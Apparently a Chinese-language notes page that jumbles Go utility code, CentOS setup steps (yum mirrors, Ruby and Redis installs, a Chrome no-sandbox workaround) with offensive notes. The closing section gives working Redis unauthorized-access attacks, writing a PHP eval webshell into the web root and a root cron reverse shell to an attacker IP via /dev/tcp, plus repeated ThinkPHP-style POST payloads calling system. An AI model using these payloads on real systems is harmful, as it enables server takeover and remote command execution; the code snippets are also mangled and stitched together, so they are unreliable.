// regexString 正则表达式 // value 匹配的内容 // 返回匹配内容的值 funcRegexFunc(regexString string, value string)string { var res string regex, _ := regexp.Compile(regexString) // 在字符串中查找匹配项 matches := regex.FindAllString(value, -1) // 输出匹配项 for _, res = range matches { } return res }
JSON 相关处理
JSON转换为map
1 2 3 4 5 6 7 8 9 10 11 12 13
//jsonStr := `{"name": "Alice", "age": 20}` funcJsonSwitchMap(jsonStr string)map[string]interface{} { // 将 JSON 数据转换为 map var data map[string]interface{} err := json.Unmarshal([]byte(jsonStr), &data) if err != nil { fmt.Println(err) } return data }
//map[age:20 name:Alice]
JSON转换为切片
1 2 3 4 5 6 7 8 9 10 11
//jsonStr := `[{"name": "Bob", "age": 25}, {"name": "Charlie", "age": 30}]` funcJsonSwitchSlice(jsonStr string) []map[string]interface{} { var data []map[string]interface{} err := json.Unmarshal([]byte(jsonStr), &data) if err != nil { fmt.Println(err) } return data } //[map[age:25 name:Bob] map[age:30 name:Charlie]]
funcRandStringBytes(n int, randomString string)string { rand.Seed(time.Now().Unix()) b := make([]byte, n) for i := range b { b[i] = randomString[rand.Intn(len(randomString))] } returnstring(b) }
// argPageCmd represents the argPage command var argPageCmd = &cobra.Command{ Use: "argPage", Short: "A brief description of your command", Long: `A longer description that spans multiple lines and likely contains examples and usage of using your command. For example: Cobra is a CLI library for Go that empowers applications. This application is a tool to generate the needed files to quickly create a Cobra application.`, PersistentPreRun: func(cmd *cobra.Command, args []string) { //检测是否输入args没有输入args就打印帮助 iflen(args) == 0 && len(os.Args) == 1 { // 如果没有提供命令或标志,则打印所有标志的帮助信息 cmd.HelpFunc()(cmd, args) os.Exit(0) } }, Run: runArgPage, }
funcinit() { rootCmd.AddCommand(argPageCmd) //这里添加argPageCmd的标志位置 argPageCmd.PersistentFlags().StringP("All", "a", "", "All to use") }
m := headerMap.(map[string]string) var headerKey string var headerValue string
for k, v := range m { headerKey = k headerValue = v } //设置header头 req.Header.Set(headerKey, headerValue) client := http.Client{ Timeout: 3 * time.Second, //超时时间 }
#修改ssh配置文件 # Port 22 去掉注释 Port 22 #------------------------分割线--------------------------- #PermitLocalCommand no #去掉注释并改为 PermitLocalCommand yes - 退出保存即可
3.连接ssh
输入密码和用户即可
Yum 源
国外的服务可忽略
1 2 3 4 5
yum install -y wget cd /etc/yum.repos.d mv CentOS-Base.repo CentOS-Base.repo.bk wget -O /etc/yum.repos.d/CentOS-Base.repo https://mirrors.aliyun.com/repo/Centos-7.repo yum clean all && yum makecache
# CentOS-Base.repo # # The mirror system uses the connecting IP address of the client and the # update status of each mirror to pick mirrors that are updated to and # geographically close to the client. You should use this for CentOS updates # unless you are manually picking other mirrors. # # If the mirrorlist= does not work for you, as a fall back you can try the # remarked out baseurl= line instead. # #
[base] name=CentOS-$releasever - Base mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=os&infra=$infra #baseurl=http://mirror.centos.org/centos/$releasever/os/$basearch/ gpgcheck=1 gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
#additional packages that may be useful [extras] name=CentOS-$releasever - Extras mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=extras&infra=$infra #baseurl=http://mirror.centos.org/centos/$releasever/extras/$basearch/ gpgcheck=1 gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
#additional packages that extend functionality of existing packages [centosplus] name=CentOS-$releasever - Plus mirrorlist=http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=centosplus&infra=$infra #baseurl=http://mirror.centos.org/centos/$releasever/centosplus/$basearch/ gpgcheck=1 enabled=0 gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
Linux 最小化工具库
因为是最小化安装,所以好多常用工具需要自行安装
1
yum install -y vim lrzsz gcc gcc-c++ net-tools wget automake cmake gzip bzip2 zip unzip kernel kernel-devel kernel-headers git-all screen
wget https://cache.ruby-lang.org/pub/ruby/3.1/ruby-3.1.2.tar.gz tar zxvf ruby-3.1.2.tar.gz rm -rf ruby-3.1.2.tar.gz cd ruby-3.1.2 ./configure make sudo make install
[launcher] Failed to get the debug url: [0224/025251.434358:ERROR:zygote_host_impl_linux.cc(90)] Running as root without --no-sandbox is not supported. See https://crbug.com/638180.
原因是chrome的沙箱问题,不能以root用户运行。
解决方案
修改 /usr/bin/ 目录下的 google-chrome 配置文件
1 2 3 4 5 6 7 8
vim /usr/bin/google-chrome #找到如下 exec -a "$0" "$HERE/chrome" "$@" #exec -a "$0""$HERE/chrome""$@" 注释掉 #添加 exec -a "$0" "$HERE/chrome" "$@" --user-data-dir --no-sandbox
wget http://download.redis.io/releases/redis-2.8.17.tar.gz tar xzvf redis-2.8.17.tar.gz cd redis-2.8.17 make cd src cp redis-server /usr/bin/ cp redis-cli /usr/bin/ cd .. cp redis.conf /etc/ redis-server /etc/redis.conf
测试未授权访问
1
redis-cli -h 目标IP -p 6379
redis 写入 webshell
利用条件
存在未授权访问漏洞,并登录redis,需要知道 web 服务器目录,并有增删改查的权限
web服务器目录,需要自己根据获取路径更改
1 2 3 4 5
redis-cli -h 目标IP -p 6379 config set dir /var/www/html/ # web服务器目录,替换 config set dbfilename shell.php set xxx "\r\n\r\n<?php eval($_POST[whoami]);?>\r\n\r\n" save
redis-cli -h 目标IP set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/攻击机IP/5555 0>&1\n\n" config set dir /var/spool/cron/crontabs/ config set dbfilename root save
POST s=whoami&_method=__construct&method=POST&filter[]=systemaaaa=whoami&_method=__construct&method=GET&filter[]=system_method=__construct&method=GET&filter[]=system&get[]=whoamic=system&f=calc&_method=filter
POST s=whoami&_method=__construct&method=POST&filter[]=systemaaaa=whoami&_method=__construct&method=GET&filter[]=system_method=__construct&method=GET&filter[]=system&get[]=whoamic=system&f=calc&_method=filter
POST s=whoami&_method=__construct&method=POST&filter[]=systemaaaa=whoami&_method=__construct&method=GET&filter[]=system_method=__construct&method=GET&filter[]=system&get[]=whoamic=system&f=calc&_method=filter
